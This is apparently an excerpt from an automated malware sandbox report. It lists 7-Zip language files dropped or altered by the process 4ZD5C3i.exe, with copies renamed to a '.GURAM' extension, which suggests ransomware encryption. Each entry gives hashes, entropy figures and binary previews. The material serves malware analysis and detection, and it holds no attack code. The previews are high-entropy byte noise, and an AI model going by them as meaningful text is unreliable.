                                                                                                                                                                                                                                                Preview:.P...7....2.1...|..n.....v..nX.ot4..o!.btB6.(.E.a~....O..o.4?.wK.x......^.>j.....x_.dO@..rw....hn.XI....I..`..$W....+R....9j.t&[.``.$..&...@..j ..x.OP(hI...6..u,.(.>+....I...w..........:..L|.pg....x./...i.=)..KPq./.-[2ct.i...m. ..n...BL.:..|V....Fp...\......|...2.&.....AJ...xS4T:.....l_s.^6.K.O..1.[e...q.Z0N....~........o.+..v..:z..1V]S:..Z....\.j#BDb....%.[{R.k..:EaP.9.....N...Z......V.K]e..H.qY+....MQ/....=...).t.........J..,....=.O}i...9.o.(.....i.l.Y9..;.<.V...rA..........b..G3....XY$.T..H.A..2a.9.....!..8.......(.rM._[z..c.K ....f..-.jH.(.......?`.0T.^|@#.@.k#..V.[.fi1-}....%.....{n..;9.3#-.]Hi...^p.../.$..g...9.m..K..#..p.v`.9.Bo-....G.QH.A.5.I..G........|.L..R....O...!.\.x.zx[]:......DK....Q 3.....D2S.LDwr...M..K.....N.v6,.....yCO..H..5u9D..O|...'sO.^H..z....pI.}.z.[&...0.L.j.g.?."..n..N.{..c.k....%.M.j...4}@v..g}O..P.}v)......+2.........8.........+...m..@....#..^..7La..l..W..*..z..jK%o.\L...2..@..aMJ.OCB>..}..xD91...$'lk...........

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\nn.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):6537
                                                                                                                                                                                                                                                Entropy (8bit):7.969740254679364
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:pkEJknszMcQRMzkxfgozShm6MaCmrYBjDzwDmUV:pkE2C/zDcJ6344NV
                                                                                                                                                                                                                                                MD5:B5827709C4BA0BBAF04599B387D498DE
                                                                                                                                                                                                                                                SHA1:A96B73D5761F9DBF8C0A3A5C11A6FED080116CD4
                                                                                                                                                                                                                                                SHA-256:EF8B13634F37FF129ECDF6D2F2634AEEFD437C3E893C1B953E832ABF028ACF00
                                                                                                                                                                                                                                                SHA-512:44FC6711A248CA5598D669DD57AC3011FBD3B92050FDC2C7F11AB94AF9C3EA4BDDB5BF3272D5C399E91868AAB9CFCFB3837D1C45B24F98A8ABA757C16285ACD7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.P...7....2.1...|..n.....v..nX.ot4..o!.btB6.(.E.a~....O..o.4?.wK.x......^.>j.....x_.dO@..rw....hn.XI....I..`..$W....+R....9j.t&[.``.$..&...@..j ..x.OP(hI...6..u,.(.>+....I...w..........:..L|.pg....x./...i.=)..KPq./.-[2ct.i...m. ..n...BL.:..|V....Fp...\......|...2.&.....AJ...xS4T:.....l_s.^6.K.O..1.[e...q.Z0N....~........o.+..v..:z..1V]S:..Z....\.j#BDb....%.[{R.k..:EaP.9.....N...Z......V.K]e..H.qY+....MQ/....=...).t.........J..,....=.O}i...9.o.(.....i.l.Y9..;.<.V...rA..........b..G3....XY$.T..H.A..2a.9.....!..8.......(.rM._[z..c.K ....f..-.jH.(.......?`.0T.^|@#.@.k#..V.[.fi1-}....%.....{n..;9.3#-.]Hi...^p.../.$..g...9.m..K..#..p.v`.9.Bo-....G.QH.A.5.I..G........|.L..R....O...!.\.x.zx[]:......DK....Q 3.....D2S.LDwr...M..K.....N.v6,.....yCO..H..5u9D..O|...'sO.^H..z....pI.}.z.[&...0.L.j.g.?."..n..N.{..c.k....%.M.j...4}@v..g}O..P.}v)......+2.........8.........+...m..@....#..^..7La..l..W..*..z..jK%o.\L...2..@..aMJ.OCB>..}..xD91...$'lk...........

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\pa-in.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):15271
                                                                                                                                                                                                                                                Entropy (8bit):7.988196835314424
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:GOBci3GFlYGmE0SLIP+OxG2Q6SHtkNNlJr:XBci2zbLIP+OVQLtEr
                                                                                                                                                                                                                                                MD5:0853B8C1A20C5B4A8E706C4138CF9157
                                                                                                                                                                                                                                                SHA1:7B9C3101CEAD97505D37B58351774AC697915486
                                                                                                                                                                                                                                                SHA-256:427C6A08D44394437190E0B9B0BFCFF43F10BF0DB17E30CDF3D197F4A5DF2BA2
                                                                                                                                                                                                                                                SHA-512:3B1DAA9ABA0A45C7C8FFF6FCD13E8956974347AAAA6C488098D597E2D0414C07C0E83FD12DC4580E6B7204511DD5BB7FC78A5E584E37D2F09340707AF210FC9D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:./~.]k.....j..`.*..e.J....:\.}Ty..M...Pn.xHR...p.......#v.".6..pE.,....f......'.C..j..W......m.e..5.LP...._....N...)7....!...........I.z....q?.pO"...+....P..\.8...1'...*...v.......}...`..P....`..2P....R..)Y..d.%.|xcg.f7.+....!..(n.ZX<-.g+...Y..o..Q=.....\..YM.Z7......ei.K.0M.M....[.*4.`..."..6. .......d.O.?e.l5.T..I.'.........=.e."...g..../P...QxM.'m...YC...0.|y^7....k3Y......."...3..!ykfVv.....26.t.a...j........1..x..M..J._.K....#.j..s....."!.Y.L.u6.<.W......o.l+:...&Yk...L xAu.q4z..xL..).~.Gh.Y.dVZ...r.W;...D......q}..b..>.....6.K.>].!./U=..q.j.wU:.W4c..........J..M.m@.^....'..]..e.o=>....r.....d8tg...i.W.._6V..3.s.`. ....$....7-@o.w......e....3....j.w..U}.-M........`....A...;.o..X.?.....&.,...C....a.{..T....G...UEr.&*...:-.Xr..?.g..}0.p)y..?.....h.j...{h+((... .a2.6K....ra".C..P.s..2$`{b.K....../._......P.>:.6..#..E..){..K..Ik^......TSA.....h....7..a..fD....w..@.#S}.m.[..z....0.T..A..Z8.5........9.rz.k.=>..!..*4...p..X.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\pa-in.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):15271
                                                                                                                                                                                                                                                Entropy (8bit):7.988196835314424
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:GOBci3GFlYGmE0SLIP+OxG2Q6SHtkNNlJr:XBci2zbLIP+OVQLtEr
                                                                                                                                                                                                                                                MD5:0853B8C1A20C5B4A8E706C4138CF9157
                                                                                                                                                                                                                                                SHA1:7B9C3101CEAD97505D37B58351774AC697915486
                                                                                                                                                                                                                                                SHA-256:427C6A08D44394437190E0B9B0BFCFF43F10BF0DB17E30CDF3D197F4A5DF2BA2
                                                                                                                                                                                                                                                SHA-512:3B1DAA9ABA0A45C7C8FFF6FCD13E8956974347AAAA6C488098D597E2D0414C07C0E83FD12DC4580E6B7204511DD5BB7FC78A5E584E37D2F09340707AF210FC9D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:./~.]k.....j..`.*..e.J....:\.}Ty..M...Pn.xHR...p.......#v.".6..pE.,....f......'.C..j..W......m.e..5.LP...._....N...)7....!...........I.z....q?.pO"...+....P..\.8...1'...*...v.......}...`..P....`..2P....R..)Y..d.%.|xcg.f7.+....!..(n.ZX<-.g+...Y..o..Q=.....\..YM.Z7......ei.K.0M.M....[.*4.`..."..6. .......d.O.?e.l5.T..I.'.........=.e."...g..../P...QxM.'m...YC...0.|y^7....k3Y......."...3..!ykfVv.....26.t.a...j........1..x..M..J._.K....#.j..s....."!.Y.L.u6.<.W......o.l+:...&Yk...L xAu.q4z..xL..).~.Gh.Y.dVZ...r.W;...D......q}..b..>.....6.K.>].!./U=..q.j.wU:.W4c..........J..M.m@.^....'..]..e.o=>....r.....d8tg...i.W.._6V..3.s.`. ....$....7-@o.w......e....3....j.w..U}.-M........`....A...;.o..X.?.....&.,...C....a.{..T....G...UEr.&*...:-.Xr..?.g..}0.p)y..?.....h.j...{h+((... .a2.6K....ra".C..P.s..2$`{b.K....../._......P.>:.6..#..E..){..K..Ik^......TSA.....h....7..a..fD....w..@.#S}.m.[..z....0.T..A..Z8.5........9.rz.k.=>..!..*4...p..X.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\pl.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):10419
                                                                                                                                                                                                                                                Entropy (8bit):7.982449920325252
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:fbOHvIYzYIQxU+UTJFOO3wP0bBT1yyEnxHWDLnETTK5Myrktwx/bZm1bQD9zUR:6PI2YKFH1l1yMEymOWwZbZmIQR
                                                                                                                                                                                                                                                MD5:BA38500DF2C00A5483F6F56082EE8938
                                                                                                                                                                                                                                                SHA1:6F48C3DE4DADC9A488466E0081742E32E5FB6C4E
                                                                                                                                                                                                                                                SHA-256:6A98F91BD22381119433D6F17F5542C4A540A50F5CEEF36A52A95A0492EE388B
                                                                                                                                                                                                                                                SHA-512:A9ABCD5DFF7D567217D568B5474CCDF59B0801B11D46DB71ECA7EBE33715AF8FB788938D956FAAD4E798DC9C72C7E568A9DBBA4693B616A8DEC7CC6B83E83B0C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...s.?.....5SFU...R..t..z0..G...X....WG.....:....&...V.0&...7.....?.q.?..0..I.]*.L.....gRB<.".f&...,[-9d.`...z...+l.a...f.........#....LKJ!.`.Zn...}.......[..$...|C._.'..Q..-.#.).=.?...q.Y.i..|%.......!..y...LN.dTQ.....b...mg.8...G1t..%l.E.M........+....P.p.)...a...e.m..F.e.....!.!~h{....{.K.l...I...o'.>.....9=.8..TNR...n......]..........8P.s\...$.....H+.$..fC....c,.....Q..b..4.....i.v.xz.o.k.n+q...[..l.....v...SW|)K.B...b?o.Qc..+h...g7V[.....zL..L....c\4.....!y.. ...b.0?-.[.(.......B}...+K.....u.Q@....0..uQ....)*.f@#._.....&......Ui.x..=..t...........O.$..k...6...S...UyV.p....."m.(..#f-......s.H..@.?..a.OT...+.p]S3.a...J.}..z...!.n..'.g..|.).e.^.Rt...bu..H....R....P.............'..\...@..R........U/.^...m.D..=.u.n}.{-....TY(t.u!..n.f..X(kTP...j../.i..*"O2..........Y...A.N..R.....0!.[=..4.eM!..n.T".tj.......Y.......f1zv4.2.....].....R.Y.[. I.-.~..C....p...#\d..y...TH.@.~..1....h.G.%.i.tDn....2-..y....j.I..%.K...z:c.....H...=s...nn....

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\pl.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):10419
                                                                                                                                                                                                                                                Entropy (8bit):7.982449920325252
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:fbOHvIYzYIQxU+UTJFOO3wP0bBT1yyEnxHWDLnETTK5Myrktwx/bZm1bQD9zUR:6PI2YKFH1l1yMEymOWwZbZmIQR
                                                                                                                                                                                                                                                MD5:BA38500DF2C00A5483F6F56082EE8938
                                                                                                                                                                                                                                                SHA1:6F48C3DE4DADC9A488466E0081742E32E5FB6C4E
                                                                                                                                                                                                                                                SHA-256:6A98F91BD22381119433D6F17F5542C4A540A50F5CEEF36A52A95A0492EE388B
                                                                                                                                                                                                                                                SHA-512:A9ABCD5DFF7D567217D568B5474CCDF59B0801B11D46DB71ECA7EBE33715AF8FB788938D956FAAD4E798DC9C72C7E568A9DBBA4693B616A8DEC7CC6B83E83B0C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...s.?.....5SFU...R..t..z0..G...X....WG.....:....&...V.0&...7.....?.q.?..0..I.]*.L.....gRB<.".f&...,[-9d.`...z...+l.a...f.........#....LKJ!.`.Zn...}.......[..$...|C._.'..Q..-.#.).=.?...q.Y.i..|%.......!..y...LN.dTQ.....b...mg.8...G1t..%l.E.M........+....P.p.)...a...e.m..F.e.....!.!~h{....{.K.l...I...o'.>.....9=.8..TNR...n......]..........8P.s\...$.....H+.$..fC....c,.....Q..b..4.....i.v.xz.o.k.n+q...[..l.....v...SW|)K.B...b?o.Qc..+h...g7V[.....zL..L....c\4.....!y.. ...b.0?-.[.(.......B}...+K.....u.Q@....0..uQ....)*.f@#._.....&......Ui.x..=..t...........O.$..k...6...S...UyV.p....."m.(..#f-......s.H..@.?..a.OT...+.p]S3.a...J.}..z...!.n..'.g..|.).e.^.Rt...bu..H....R....P.............'..\...@..R........U/.^...m.D..=.u.n}.{-....TY(t.u!..n.f..X(kTP...j../.i..*"O2..........Y...A.N..R.....0!.[=..4.eM!..n.T".tj.......Y.......f1zv4.2.....].....R.Y.[. I.-.~..C....p...#\d..y...TH.@.~..1....h.G.%.i.tDn....2-..y....j.I..%.K...z:c.....H...=s...nn....

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\ps.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9248
                                                                                                                                                                                                                                                Entropy (8bit):7.980666179385808
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:Ex69efFBeM2JTd/68pIpBmmkWg8mJk8GY1S8ZqCQ/15D1o6Uz:Q6SFB+JTPpIzmm4lbDBz
                                                                                                                                                                                                                                                MD5:7471F644FFAC52B807291F46F74D0FC2
                                                                                                                                                                                                                                                SHA1:F13F111F60170EF005037846951F1BA7B8877AF2
                                                                                                                                                                                                                                                SHA-256:74411CE39AA4BB3FF1BB32AF30AE59F464B9439D0F57515942B8060B98309076
                                                                                                                                                                                                                                                SHA-512:BBD7515A44CB8E7D40FDCD546A5917BE6D1CB272D6A88C1B2AD6AF6708F4CCA95BC4F4CF8E5AD3190A1331755C54008116EF48EB481F1B2303C49C2424EAB288
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:>..K.N..;a..C~..N.....j.PN....t..i..D.t.BO.....M..[.......C.."......v(...jC.k.K.WJ.......5.n....3.C..X...}-.@..d..)|1e..p....jkL/...._........?..xp.......~~'.u..3...2..<e}...F..y..z-U._..I<pl....h.......A.be7..y~.^....4.U.S.(...|..K.k.Eb&b...@...`i......}...V?....s.F.<W.j.>..0.6.Z.<....=hJw..}. .(.t....$.M+I.1..9..UE..+*1......n......1.......8...>...........v..|....k..~......KP.6..{/y.4.NR..C."{2....V.j.;(..J.e...D..Z.Z......%....4.$.}X.....#...X.."I.?.....l.)A.[.......M.;.."....*aJ..r:t..t....V.J..,.9.........](..a..c.n}e{r.b.x....q. >.,.!Q...(Y..Y.1.... ....Lp.s.....uOP......L_>}.j...G.%...IE...E0.]=o..(}..h.;.rp...Sl..|.i./..P.M..N.....&.d..1.....h..).=..qWO.s...fe....s."....;$.......;4dK...:..(.7....@..^......5...5).p.%n....`.w.L....aJ]E..../..........d...>2U....me...;.c.L....+vv.U..6(.h\..N....Tq.]l..V...r..]!].>w.r...U$}......'M...6.....U...p.D..u....+....9j{f..,6...UD...d._m.....0|-...0..9.6.g1...........o.@#S...i.8.........2F}....

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\ps.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9248
                                                                                                                                                                                                                                                Entropy (8bit):7.980666179385808
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:Ex69efFBeM2JTd/68pIpBmmkWg8mJk8GY1S8ZqCQ/15D1o6Uz:Q6SFB+JTPpIzmm4lbDBz
                                                                                                                                                                                                                                                MD5:7471F644FFAC52B807291F46F74D0FC2
                                                                                                                                                                                                                                                SHA1:F13F111F60170EF005037846951F1BA7B8877AF2
                                                                                                                                                                                                                                                SHA-256:74411CE39AA4BB3FF1BB32AF30AE59F464B9439D0F57515942B8060B98309076
                                                                                                                                                                                                                                                SHA-512:BBD7515A44CB8E7D40FDCD546A5917BE6D1CB272D6A88C1B2AD6AF6708F4CCA95BC4F4CF8E5AD3190A1331755C54008116EF48EB481F1B2303C49C2424EAB288
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:>..K.N..;a..C~..N.....j.PN....t..i..D.t.BO.....M..[.......C.."......v(...jC.k.K.WJ.......5.n....3.C..X...}-.@..d..)|1e..p....jkL/...._........?..xp.......~~'.u..3...2..<e}...F..y..z-U._..I<pl....h.......A.be7..y~.^....4.U.S.(...|..K.k.Eb&b...@...`i......}...V?....s.F.<W.j.>..0.6.Z.<....=hJw..}. .(.t....$.M+I.1..9..UE..+*1......n......1.......8...>...........v..|....k..~......KP.6..{/y.4.NR..C."{2....V.j.;(..J.e...D..Z.Z......%....4.$.}X.....#...X.."I.?.....l.)A.[.......M.;.."....*aJ..r:t..t....V.J..,.9.........](..a..c.n}e{r.b.x....q. >.,.!Q...(Y..Y.1.... ....Lp.s.....uOP......L_>}.j...G.%...IE...E0.]=o..(}..h.;.rp...Sl..|.i./..P.M..N.....&.d..1.....h..).=..qWO.s...fe....s."....;$.......;4dK...:..(.7....@..^......5...5).p.%n....`.w.L....aJ]E..../..........d...>2U....me...;.c.L....+vv.U..6(.h\..N....Tq.]l..V...r..]!].>w.r...U$}......'M...6.....U...p.D..u....+....9j{f..,6...UD...d._m.....0|-...0..9.6.g1...........o.@#S...i.8.........2F}....

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\pt-br.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):10531
                                                                                                                                                                                                                                                Entropy (8bit):7.98064093289148
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:g7Z0MiQnshycV58WeN2ewmb0qamVL237ITEEnvpFLwrqZV+US:SeQnshy0c+fq5OyEEnROrq3VS
                                                                                                                                                                                                                                                MD5:493079E3F188DEF2647FE52BFF701013
                                                                                                                                                                                                                                                SHA1:E7AAA7CEAF85877FBAAA947D8A8070581819E7B7
                                                                                                                                                                                                                                                SHA-256:E9E489BD15B90EBF120CC7EFA8236783E85A53E432C5E46F6D99031F2FAAC3C7
                                                                                                                                                                                                                                                SHA-512:17579FF01063CF0F8A9DC13DFF519DB49965591D5550514020751DBC86E746D0772CC8E565B00D593B69EA3144EFF61393F55EE034FF45EE639FAE2D337B2756
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...Q...@c.=..e,....q....mCz..H..j.2v].."..M.|.....r9B{.+.G...U...On.=.....*2..ff.~...(..Bg....l\0%r.ZY..4,hk.).Q..|.....:9......@t.H...Z;...].d...<....M........O.O6j....w!...(..Nl.s......e.....T.....j....|a.s.'.Q..^.D. ...U....md..V~.`.Vs...........5?._,.....I....6.\......g+e5....Xi.|......FD....j.A..u...v...i2..a..<.......G........G.;?....{..M?..}..P.,$ .m.^7 .[......o.L......5.K...\.._...W......O..D.g.P.r..$...]....N.+..A.Y.6|.g.j........-...>s..=..#........!..R...<Od...."...K._?t5S.......9........Q.V!...XA.~%6.....R.?.......].D_...I.&.....q....$..A[.!Ht.m.y..i..y}.0t.....'.:...+....'.tM....9.[....}n.....o...X%I..bQ..X.~6T.D.%\K.S>O.k{...)...1TW....N.........+.....>*.Nw.Yns..N..M.N...VP....I.=Y.........Z..]Cl9q...".........%6%...<..x.a...u<..AbV....#.8..W.A.YvUa|.Poo...w.u.G...n...>'.&.c...a~.....v..Y.h.PF.e|....=k....N.V*......i.5Cn.x..B..Z. ...kc.7.n.}....f#.~..UK..W.......w.^..4.....p..H...hD.^.b.L.z.$....O1..._Z. ...Q..$(D..'.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\pt-br.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):10531
                                                                                                                                                                                                                                                Entropy (8bit):7.98064093289148
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:g7Z0MiQnshycV58WeN2ewmb0qamVL237ITEEnvpFLwrqZV+US:SeQnshy0c+fq5OyEEnROrq3VS
                                                                                                                                                                                                                                                MD5:493079E3F188DEF2647FE52BFF701013
                                                                                                                                                                                                                                                SHA1:E7AAA7CEAF85877FBAAA947D8A8070581819E7B7
                                                                                                                                                                                                                                                SHA-256:E9E489BD15B90EBF120CC7EFA8236783E85A53E432C5E46F6D99031F2FAAC3C7
                                                                                                                                                                                                                                                SHA-512:17579FF01063CF0F8A9DC13DFF519DB49965591D5550514020751DBC86E746D0772CC8E565B00D593B69EA3144EFF61393F55EE034FF45EE639FAE2D337B2756
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...Q...@c.=..e,....q....mCz..H..j.2v].."..M.|.....r9B{.+.G...U...On.=.....*2..ff.~...(..Bg....l\0%r.ZY..4,hk.).Q..|.....:9......@t.H...Z;...].d...<....M........O.O6j....w!...(..Nl.s......e.....T.....j....|a.s.'.Q..^.D. ...U....md..V~.`.Vs...........5?._,.....I....6.\......g+e5....Xi.|......FD....j.A..u...v...i2..a..<.......G........G.;?....{..M?..}..P.,$ .m.^7 .[......o.L......5.K...\.._...W......O..D.g.P.r..$...]....N.+..A.Y.6|.g.j........-...>s..=..#........!..R...<Od...."...K._?t5S.......9........Q.V!...XA.~%6.....R.?.......].D_...I.&.....q....$..A[.!Ht.m.y..i..y}.0t.....'.:...+....'.tM....9.[....}n.....o...X%I..bQ..X.~6T.D.%\K.S>O.k{...)...1TW....N.........+.....>*.Nw.Yns..N..M.N...VP....I.=Y.........Z..]Cl9q...".........%6%...<..x.a...u<..AbV....#.8..W.A.YvUa|.Poo...w.u.G...n...>'.&.c...a~.....v..Y.h.PF.e|....=k....N.V*......i.5Cn.x..B..Z. ...kc.7.n.}....f#.~..UK..W.......w.^..4.....p..H...hD.^.b.L.z.$....O1..._Z. ...Q..$(D..'.

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\pt.txt

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):10497
                                                                                                                                                                                                                                                Entropy (8bit):7.983358252484921
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:7oQJbmIj1fQVDHsiCQzfRWSwPt+gGb+0sFFjiHgmhwMzYz1A4LJXegYUQ:VmIj1fQVMiffgt+n+0+Fu3hwsO1DLFlo
                                                                                                                                                                                                                                                MD5:6358242B952AB789DF718E7F2D29C266
                                                                                                                                                                                                                                                SHA1:25DA460DC683F5599644AB38F2FCF83F3095961F
                                                                                                                                                                                                                                                SHA-256:4757AE7B7BDF17E1B33CDA1829581F42CCE135F8FAE29713B2826AF08BBAEA0B
                                                                                                                                                                                                                                                SHA-512:AAB025B7D758F741CCD8243D584EB75C501607B27CF06B5B768AF280950AF32DE639AD0D33CF41EF3304D7C3C329CB75188703BF44B0DF6B0E749BB44C028FCA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:/.9.....R...3..D.d~..PwV.]I..5.J.|w)-..C5&g^e..2.....&e..3"c..%..ws.... ....j......9...j@.a.e~L..e.Y..9....V....qNjN.......!3.qv......l.!.<D`e..N".en.....Y.;...{.....l.s...e.[0...Q.s ...R.zD..... .#0].....8z.._?9..>..p=......Q.U.....a.Y.X..h^U....Q.;5.%"..vJ+C......Z..5..&a.f.<.>.zl.XX1.N....&....7UQ.].0[..^.a.9.#.......M.p.......%i.%..~4..0.`.*~.&3.xA...P..x.%.8.. ...k.._....7...K...D<x.j.?.m..3_2.oi<K..Kq...3..v(.G....MK#.g.!.....h.D.F... ...C...[Z...3T...i..Z}.]...Lz_n.mA....K.GK!.A=2...o.A.p.b....iR.{.Q.r..U&h<4.@...K...N..?+ .....a...E.w..*`..K-r....!D....Y.X.A......{.......`...T...?K..F..j.....p..]u..).E..t.cg+...........b...'g...\e......hNN..7F..._.....~R..)$.6.c..)..y.(......6.l."....m..W.....9..M..6..V.>).5.....jl.A.'..LT.%.....K@...T.}.x"....#..8N..K.Y.r.,+T.......(...!c.w@..C.!W.w..Z.....T.....t\|..."%r..o<.<......L@.y.!...~q......is\..Obn..S.....3SS...+jk........3k...i.zt..V`..d...l..m.p/.u...d#.......U.T.x..-..+.....

                                                                                                                                                                                                                                                C:\Program Files\7-Zip\Lang\pt.txt.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):10497
                                                                                                                                                                                                                                                Entropy (8bit):7.983358252484921
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:7oQJbmIj1fQVDHsiCQzfRWSwPt+gGb+0sFFjiHgmhwMzYz1A4LJXegYUQ:VmIj1fQVMiffgt+n+0+Fu3hwsO1DLFlo
                                                                                                                                                                                                                                                MD5:6358242B952AB789DF718E7F2D29C266
                                                                                                                                                                                                                                                SHA1:25DA460DC683F5599644AB38F2FCF83F3095961F
                                                                                                                                                                                                                                                SHA-256:4757AE7B7BDF17E1B33CDA1829581F42CCE135F8FAE29713B2826AF08BBAEA0B
                                                                                                                                                                                                                                                SHA-512:AAB025B7D758F741CCD8243D584EB75C501607B27CF06B5B768AF280950AF32DE639AD0D33CF41EF3304D7C3C329CB75188703BF44B0DF6B0E749BB44C028FCA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:/.9.....R...3..D.d~..PwV.]I..5.J.|w)-..C5&g^e..2.....&e..3"c..%..ws.... ....j......9...j@.a.e~L..e.Y..9....V....qNjN.......!3.qv......l.!.<D`e..N".en.....Y.;...{.....l.s...e.[0...Q.s ...R.zD..... .#0].....8z.._?9..>..p=......Q.U.....a.Y.X..h^U....Q.;5.%"..vJ+C......Z..5..&a.f.<.>.zl.XX1.N....&....7UQ.].0[..^.a.9.#.......M.p.......%i.%..~4..0.`.*~.&3.xA...P..x.%.8.. ...k.._....7...K...D<x.j.?.m..3_2.oi<K..Kq...3..v(.G....MK#.g.!.....h.D.F... ...C...[Z...3T...i..Z}.]...Lz_n.mA....K.GK!.A=2...o.A.p.b....iR.{.Q.r..U&h<4.@...K...N..?+ .....a...E.w..*`..K-r....!D....Y.X.A......{.......`...T...?K..F..j.....p..]u..).E..t.cg+...........b...'g...\e......hNN..7F..._.....~R..)$.6.c..)..y.(......6.l."....m..W.....9..M..6..V.>).5.....jl.A.'..LT.%.....K@...T.}.x"....#..8N..K.Y.r.,+T.......(...!c.w@..C.!W.w..Z.....T.....t\|..."%r..o<.<......L@.y.!...~q......is\..Obn..S.....3SS...+jk........3k...i.zt..V`..d...l..m.p/.u...d#.......U.T.x..-..+.....

